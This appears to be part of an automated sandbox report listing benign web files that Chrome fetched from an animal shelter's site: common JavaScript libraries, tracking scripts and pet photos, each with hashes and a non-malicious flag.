                                                                                                                                                                                                                                                        Preview:void 0===TCB_Front.js_modules.dropdown&&TCB_Front.setModuleLoadedStatus("dropdown",!1),(t=>{if(TCB_Front.isModuleLoaded("dropdown"))return;const e=".tve_lg_dropdown, .tcb-form-dropdown, .tve-dynamic-dropdown";t(window).on("tcb_after_dom_ready",(()=>{if(!TCB_Front.Utils.isEditorPage()){const e=t(TCB_Front.Utils.isEditorPage()?"#tve_editor":"body");TCB_Front.Utils.initDropdown(e)}})),TCB_Front.Utils.initDropdown=o=>{t(".tve_lg_dropdown .tve-lg-dropdown-trigger, .tcb-form-dropdown .tve-lg-dropdown-trigger, .tve-dynamic-dropdown .tve-lg-dropdown-trigger").each((function(){t(this).attr("tabindex",-1).removeAttr("href").siblings("input").attr("style","position: absolute; opacity: 0;").attr("autocomplete","off")}));let n="";const d=function(){n="",t(".tve-lg-dropdown-search").length&&t(".tve-lg-dropdown-search").val(""),t(".tve-lg-dropdown-option.tve-state-hover,.tve-dynamic-dropdown-option.tve-state-hover").removeClass("tve-state-hover")},r=function(t,e){e.find(".tve-lg-dropdown-trigger").fi
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9956), with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):9956
                                                                                                                                                                                                                                                        Entropy (8bit):5.112190098883882
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:FkNkq5EkG7Dbce7Mw8YKi3wjZqXdoRw7f2mMR8kHcQFDervnba4b3OjJ8frBy5Nq:GWq5EkG3bxIwuiMqXdOkemMCkHXFozDT
                                                                                                                                                                                                                                                        MD5:70218C74BDB4EFC16FE5AFD8FF76F10F
                                                                                                                                                                                                                                                        SHA1:407FB8E3944DF84CD26A54D3D2CF0FCA5AE01DE8
                                                                                                                                                                                                                                                        SHA-256:27755BD63EC28B85EA92DB1879E49759B6B6B80682506FF3233AB8E896A34F66
                                                                                                                                                                                                                                                        SHA-512:83F4A330048D131258957A100131DF8FA4C50876FFCF6F752300C2BE7860732E6011084BD675CF4ACF99C4AE88FC5B89D1B3648FEECB094B3BA7246EA28B5211
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/search-form.min.js?v=10.4.2&ver=10.4.2
                                                                                                                                                                                                                                                        Preview:(()=>{var e={69158:e=>{void 0===TCB_Front.js_modules["search-form"]&&TCB_Front.setModuleLoadedStatus("search-form",!1),((t,i)=>{if(TCB_Front.isModuleLoaded("search-form"))return;const s=".thrv-search-form",a=e=>{try{new n(t(e),!!TCB_Front.Utils.isEditorPage())}catch(e){}};window.addEventListener("load",(()=>{i.$body.find(s).each(((e,t)=>{a(t)}))})),t(window).on("tcb_after_dom_ready",(()=>{t(s).each(((e,t)=>{a(t)}))}));class n{constructor(e,t=!0){e.is(s)&&!e.hasClass("thrv-sticky-search")&&(e.data("tcb.search")&&!t||(this.$element=e,this.$form=e.find("form"),this.$input=e.find(".thrv-sf-input"),this.$submit=e.find(".thrv-sf-submit"),this.$submitButton=this.$submit.find("button"),this.isEditor=t,this.$input.removeClass("thrv-sf-input-hide"),this.onResize(),this.isEditor?this.$form.off("submit").on("submit",(()=>!1)):this.bindEvents(),this.$element.attr("id")&&this.$element.attr("data-selector",`${s}#${this.$element.attr("id")}`),e.data("tcb.search",this)))}onResize(){this.readData(),this
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (17021)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):382526
                                                                                                                                                                                                                                                        Entropy (8bit):5.6595485549860625
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:VVAsKy+3IsyyH1/SVUCcv4bKonhsG75dGDhNcvnzH04:XToIta1/nvWGDfiTR
                                                                                                                                                                                                                                                        MD5:727756337DF17831AEB698B472D4F9E4
                                                                                                                                                                                                                                                        SHA1:31180A6ECE84DED1BF68EA71AF2A4C57C0DEBDE3
                                                                                                                                                                                                                                                        SHA-256:EA743578129E758C9103A30B14677BCDC43E5A1567F3D0EF0A88708DC886CB26
                                                                                                                                                                                                                                                        SHA-512:27278BEB965A71BB148A56BF544473D36F81DA6210586771605A78ADEE7E2FE7F60ED4AC2AD76226B2A963BD83B6F14206698C838C994DB2E79DA4693D47FB8C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtag/js?id=G-RSYQJ6KTLL&cx=c&_slc=1
                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":8,"vtp_value":true,"tag_id":11},{"function":"__ogt_ip_mark","priority":8,"vtp_instanceOrder":0,"vtp_paramValue":"internal","vtp_ruleResult":["macro",1],"tag_id":13},{"function":"__ogt_referral_exclusion","priority":8,"vtp_includeConditions":["list","petango\\.com","petango\\.stage"],"tag_id":14},{"function":"__ogt_session_timeout","priority":8,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":15},{"function":"__ogt_1p_data_v2","priority":8,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR",
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (13479)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):13577
                                                                                                                                                                                                                                                        Entropy (8bit):5.272065782731947
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:5rprDN+sag6ifKIUpQI99P1tLm9kdgyq1+J3aCJQ+h4MPLORq:5rprxaefKI0LP19m4q1WW+h4Mjp
                                                                                                                                                                                                                                                        MD5:9FFEB32E2D9EFBF8F70CAABDED242267
                                                                                                                                                                                                                                                        SHA1:3AD0C10E501AC2A9BFA18F9CD7E700219B378738
                                                                                                                                                                                                                                                        SHA-256:5274F11E6FB32AE0CF2DFB9F8043272865C397A7C4223B4CFA7D50EA52FBDE89
                                                                                                                                                                                                                                                        SHA-512:8D6BE545508A1C38278B8AD780C3758AE48A25E4E12EEE443375AA56031D9B356F8C90F22D4F251140FA3F65603AF40523165E33CAE2E2D62FC78EC106E3D731
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:/*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],a=1;a<=3;a++){if(+o[a]<+n[a])return 1;if(+n[a]<+o[a])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.4.1";var t=Object.create(null);s.migrateDisablePatches=function(){for(var e=0;e<arguments.length;e++)t[arguments[e]]=!0},s.migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")||n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migrateWarnings
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 420x560, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):61698
                                                                                                                                                                                                                                                        Entropy (8bit):7.971349587862647
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:g333s83HIboR0k4EMwGY1e8sJyjsof/gcM:sP3ocnGQky9gcM
                                                                                                                                                                                                                                                        MD5:ABFDA0858DED608AD5556B47F689A259
                                                                                                                                                                                                                                                        SHA1:95D4FC3F204282BE03C01D274B06B2F84092591C
                                                                                                                                                                                                                                                        SHA-256:11C81F856C6E90EDD68D50F33C17414045E837B351AB1E1FD7B4F5A30775D1B1
                                                                                                                                                                                                                                                        SHA-512:4483D162FD0D71169C35DFB8B8EAD9E342D2DD1508925F75CCC2A347A825A8CDB8829D77BC79E1E8D8B672D5B37D3717BA892E8CB5230629E60491B11779C645
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/45e9cc7f-8a67-4e62-aa35-92ae279c9453.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H..............................................................................................................................................0...."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......q.I.Tr.j.:.&j.o.L..3..0..a...W..+.....J.X.c.... .1...Tw=.M....[..n...}.q.|.(.'?.....R....V.u..V..+.H.-..A....J..%.....*.f^3a7.VT?.V...........j..w..x\L.{..5...s........_...J..\....?yo..}.%?.M+.........5n...A.....\.~3....E.%....'.t........0*l....%.p76.....q...TI...<c...S]._=..g.....i4..z........l+....}l..`;g.A.......?4._2g.._..)gT_=].L05s.....Ta.w3.>.y.rl.T.;.{c..U
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (22652), with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):22652
                                                                                                                                                                                                                                                        Entropy (8bit):5.130075462655113
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:utRoCC81i123OT8aY12/LxvhiS5dPx7jgBUlLHUnrSzhYdU7J7jmIR78tXTeDPvH:utRq81i123c8aY12/LviS3x7jgBUlL0A
                                                                                                                                                                                                                                                        MD5:F9FB1DB593A7662FBDD8771F402D2DA3
                                                                                                                                                                                                                                                        SHA1:C0BF28918B70C02E42A1A067122C13E8B24C3B44
                                                                                                                                                                                                                                                        SHA-256:25DB9B261556022E99A1966AFFB79F087FFB830FDF7201B23198CD58180907C8
                                                                                                                                                                                                                                                        SHA-512:95F3AC812BDA6A4BC571013D9AEB1304A15A9DAD70A0DEB26BE82C7B2E41FD49400283D4BD829A4BF734F085AF51F8A33ECEC3FD4A9CB1C7061008715E717118
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/lead-generation.min.js?v=10.4.2&ver=10.4.2
                                                                                                                                                                                                                                                        Preview:void 0===TCB_Front.js_modules["lead-generation"]&&TCB_Front.setModuleLoadedStatus("lead-generation",!1),((t,e)=>{if(e.isModuleLoaded("lead-generation"))return;t(window).on("tcb_after_dom_ready",(()=>{const r=t(e.Utils.isEditorPage()?"#tve_editor":"body");a.initRadioInputs(r),a.initCheckboxInputs(r),e.Utils.isEditorPage()||(t(".thrv_lead_generation").tve_front_lead_generation(),a.initRecaptcha(),a.initTurnstile(),a.initCustomSpamPreventor())}));const a={initRadioInputs(e){t('[data-default="1"]').closest(".tve_lg_radio_wrapper").addClass("tve-state-expanded"),e.off("change.inputradio").on("change.inputradio",".tve_lg_radio_wrapper input",(function(){const e=t(this).closest(".tve_lg_radio_wrapper");e.siblings(".tve-state-expanded").removeClass("tve-state-expanded"),e.addClass("tve-state-expanded")}))},initCheckboxInputs(e){e.off("change.inputcheckbox").on("change.inputcheckbox",".tve_lg_checkbox_wrapper input",(function(){const e=t(this);e.closest(".tve_lg_checkbox_wrapper").toggleClass("
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1021)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):1590
                                                                                                                                                                                                                                                        Entropy (8bit):5.164128754121163
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:S+wOTWXY6K6qFMSnilfl2lYFSnNVGUmx5N5:xT8Y6KZAUmxz5
                                                                                                                                                                                                                                                        MD5:5BE7221067EC06B5CF0DA08275E362F2
                                                                                                                                                                                                                                                        SHA1:5FA371DFA579B506290E9EF74B24E124B0245CD5
                                                                                                                                                                                                                                                        SHA-256:3FC2845D22C09928BA9DAE73F657A21EDE05BED89A42EFAFE1028BCBE4EE499B
                                                                                                                                                                                                                                                        SHA-512:1CF71CD6D65811DC11719D810B8F77F63BF65353443B44196BA3FAF2FD15E2CA612049AC5032D422479BF21EFB2A3EA297592EBC5D1EE83A74AD2B4CBB06D177
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/plugins/quick-pagepost-redirect-plugin/js/qppr_frontend_script.min.js?ver=5.2.4
                                                                                                                                                                                                                                                        Preview:;(function($){$(document).ready(function(){var newWindowArr=qpprFrontData.linkData;var root=qpprFrontData.siteURL;var qroot=qpprFrontData.siteURLq;$('a[href]').each(function(){var thisMatch=$(this);var href=typeof $(this).attr('href')!=='undefined'?$(this).attr('href'):'';var linkFound=qppr_in_array(href,newWindowArr);if(linkFound!==false){var rel='undefined'!==typeof $(this).attr('rel')?$(this).attr('rel'):'';var tar='undefined'!==typeof $(this).attr('target')?$(this).attr('target'):'';var doNW=false;var doNF=false;var rURL='';var hChk=href;if(linkFound=='1'){doNW=newWindowArr[href][0];doNF=newWindowArr[href][1];rURL=newWindowArr[href][2];}else if(linkFound=='2'){doNW=newWindowArr[href.replace(root,'')][0];doNF=newWindowArr[href.replace(root,'')][1];rURL=newWindowArr[href.replace(root,'')][2];hChk=href.replace(root,'');}else if(linkFound=='3'){doNW=newWindowArr[href.replace(qroot,'')][0];doNF=newWindowArr[href.replace(qroot,'')][1];rURL=newWindowArr[href.replace(qroot,'')][2];hChk=hre
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1626)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):1819
                                                                                                                                                                                                                                                        Entropy (8bit):5.047296238035306
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:aUTV//j2ew8p/xnqy8VLF8Xlm7uEQGe1dLpDXzRRvCpx+zVfDpnOKLJWbqQApIsi:HgQBq5LYlm71TopDaW1ObqhuqVcPf
                                                                                                                                                                                                                                                        MD5:CD0EB3406096FF80266E7C9D7D419186
                                                                                                                                                                                                                                                        SHA1:0E3709691BF96233766DE30E2FD473B84166C5B6
                                                                                                                                                                                                                                                        SHA-256:C2E606E1FC82EA3A554AAD5D0520E25D2677B89A891DC5C49E7ACE08FCE92E25
                                                                                                                                                                                                                                                        SHA-512:3CAF5308CDBC5F42F1ECCF5944E8CA785AC086B85954765C1F40D91BD9CC9F3FE6EB816AD821B534F9AD36395F4B6B5D361BEA24EB272E94CAD2824F03FAAAC6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-includes/js/jquery/jquery.masonry.min.js?ver=3.1.2b
                                                                                                                                                                                                                                                        Preview:/*!. * Masonry v2 shim. * to maintain backwards compatibility. * as of Masonry v3.1.2. *. * Cascading grid layout library. * http://masonry.desandro.com. * MIT License. * by David DeSandro. */.!function(a){"use strict";var b=a.Masonry;b.prototype._remapV2Options=function(){this._remapOption("gutterWidth","gutter"),this._remapOption("isResizable","isResizeBound"),this._remapOption("isRTL","isOriginLeft",function(a){return!a});var a=this.options.isAnimated;if(void 0!==a&&(this.options.transitionDuration=a?this.options.transitionDuration:0),void 0===a||a){var b=this.options.animationOptions,c=b&&b.duration;c&&(this.options.transitionDuration="string"==typeof c?c:c+"ms")}},b.prototype._remapOption=function(a,b,c){var d=this.options[a];void 0!==d&&(this.options[b]=c?c(d):d)};var c=b.prototype._create;b.prototype._create=function(){var a=this;this._remapV2Options(),c.apply(this,arguments),setTimeout(function(){jQuery(a.element).addClass("masonry")},0)};var d=b.prototype.layout;b.prototype.la
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (7155)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):322901
                                                                                                                                                                                                                                                        Entropy (8bit):5.571609948016896
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:sK2+EG+3bw/YHzporl03rQ1A5yCOA7LcGB84x94czxKonhsGH3voElwH:sy+3bsYH18SVUCTv4QKonhsGHg/
                                                                                                                                                                                                                                                        MD5:EA00990EF06CCECA736CA8DE6F81190C
                                                                                                                                                                                                                                                        SHA1:406605AE398E016478C73119886FB096B089EC5B
                                                                                                                                                                                                                                                        SHA-256:689C11111B9094931386F3D649E3BE5BF787A653E77D00987075BC1CFA35B28D
                                                                                                                                                                                                                                                        SHA-512:FF2282802D53B34D90571BBD231D575B06F6EE9C26A425AEF33CBA8ED14CC4223468FBB5BF9CFF0970519DFB9CFDD90CDC45550913D43DDD9543D25D031C62AE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"33",. . "macros":[{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.value"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.transaction_id"},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_name":"gtm.elementId","vtp_dataLayerVersion":1},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__v","vtp_name":"gtm.elementUrl","vtp_dataLayerVersion":1},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2485)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):26027
                                                                                                                                                                                                                                                        Entropy (8bit):5.3038105115157475
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:so/MPtWU9YwUpxbY/Y3YOgQYeYZYHYZYVY+YSYsph6FocXpOJRqKYTaMmk:RIT7sZwuvL54WAcl/Q
                                                                                                                                                                                                                                                        MD5:2F29D251681DD2A797E2198B978A162B
                                                                                                                                                                                                                                                        SHA1:4298B8D97FBD52D36C2606CC350E76BFFD1FFF82
                                                                                                                                                                                                                                                        SHA-256:21F059BD41F1976D5A97E03A759CAA58B9AF71B94FB27B6A8A4A4CC4CDAB41A0
                                                                                                                                                                                                                                                        SHA-512:A744D34CA261EEACF342F39916E6BC4C71034EAA3BCD8407ED97B0E5AC91925F091AF669AB38B176E0F539E05F75AD46CC0ED22A36C6F3A03108E978DD6493AA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://connect.facebook.net/signals/config/1174527456525563?v=2.9.179&r=stable&domain=indyhumane.org&hme=b8122d5d96cd6f542162ba4f497489972d1ebe228d24c39d34f560e30ae932ce&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C203%2C202%2C204%2C209%2C210%2C211%2C207%2C199%2C133%2C164%2C198%2C200%2C123%2C158%2C146%2C152%2C130%2C236%2C117%2C128%2C237%2C166%2C120%2C239%2C167%2C137%2C124%2C155%2C149%2C195%2C114%2C129
                                                                                                                                                                                                                                                        Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 420x420, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):39467
                                                                                                                                                                                                                                                        Entropy (8bit):7.976059977575099
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:9vyFv5+PxrpOKh4yK0JVshLAmEzUqNX+W/jhx70ukn+QWa:9KKBpHwhLARBX+W/jXXZa
                                                                                                                                                                                                                                                        MD5:9779D2EA901768D1B4205C90DBE3ED01
                                                                                                                                                                                                                                                        SHA1:762303B1A2E7AF1CFE4E6FB75079A8B399E30B52
                                                                                                                                                                                                                                                        SHA-256:8B83A452F9085F5750EC0BD4197AC32FD38BF183727341A788D7F7B7D35FDA6A
                                                                                                                                                                                                                                                        SHA-512:558EC2A8A4AE6207E1624514D07888633F27E919B2DF6F41AEA7F4E3013D06C826FCBEA6469A64068C71D11C84588FA79E7B2E400C68035EC42D06A7BEB8E8DD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/39f4fd8f-1529-42bf-86fc-7f36c7c27f03.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,..................................................................................................................................................."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.g.xDZ..^.c....A...|W...`..4..:.%...v..1...Un.s.i#.$...p.HH9.V.@<..@..*3@x<.ERC..9...Sp<..T.Q.....a..9...`x..NHo..]..*.J....4.[.......AV,..v.4....s..[v^..=j.I.......H.m.....,.....\*..5,..`.{P..&:n<V...9.F1X...lU.e-.3.C,...?.z'....t..7d..x....<-.%....e?..|K...cZ..p.q....a.M..t...^....WwL.."M...v^..E....a...G..5.rAM...+.B.X....*M&bu9.M..NM #..........D.nV..Fk&..r.=..>.5
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2, orientation=upper-left], baseline, precision 8, 480x640, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):72344
                                                                                                                                                                                                                                                        Entropy (8bit):7.9753071080533635
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:MCi/vKs+734Gz05FJE+9hyDb0g/o2MgBNMH9bYPvUa/lqrw:Zi+3SbLyDlyAo9bcvUOw8
                                                                                                                                                                                                                                                        MD5:125530A417048C654CEBD5C696904926
                                                                                                                                                                                                                                                        SHA1:89FF845E54EE13E0850218396C306367FD127D79
                                                                                                                                                                                                                                                        SHA-256:5D73B5F34BA3C626549061B326F979673ED2EAAFF98B2C2AD084835EF821A35B
                                                                                                                                                                                                                                                        SHA-512:3D78B4A340D604BD06A0C050B17FB6CBC6C66960ACE56622E494B6333EF47EEE582C6A26274A472A23B44722114D4B23208BFB56C70D791F624A3769F622FD57
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/e814d785-2335-404a-8a20-0cb3ae2c5441.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.............ZExif..MM.*...................i.........&..................................................C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..........................................................................................?...h..U...~E...R..J...:....9....EU.s..Uhq]...:UV.zf..0./J....w.JH9.*,.QZ...d...du.....$.W.Nj....U."..d.....f4|.vCZl...%M...L).^h.j..+...qQ..cm0.t...6R...jN3J.E.z.u.c...@G$..w.m[sV|.5n..H.(.Po-k.... ...v.}..W..n.JgR.)r...BzU...M.".F.....XW......a.P.6.2...j=..]..
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (8349)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):8536
                                                                                                                                                                                                                                                        Entropy (8bit):5.053313782705997
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:7r2AeY1jWBoYfgZn+gSEmaAGCkHjpXCNd882E9cNS/JWmx:7r2AeSWBoYfon+gSDkrH1XCNd882E9ce
                                                                                                                                                                                                                                                        MD5:6A53E18A345B37D4F72262A071684E79
                                                                                                                                                                                                                                                        SHA1:7269F0F9A41CA95DF23387E1C4DAD415F0228979
                                                                                                                                                                                                                                                        SHA-256:3AB937AE57EF4A48601774B6A0CC701482A5C8BC126FCB677DB4842B3A3C0003
                                                                                                                                                                                                                                                        SHA-512:7F1B7BA5EBAFB6E1CB9791CE8A0AD6EEC1A743E6B15AD3E2D05F38ECF9A7F3437E41F398D3A91FCFBD294073CAE25C4E4F6B5FC96526828071A0FC5EE0327B78
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.13.3
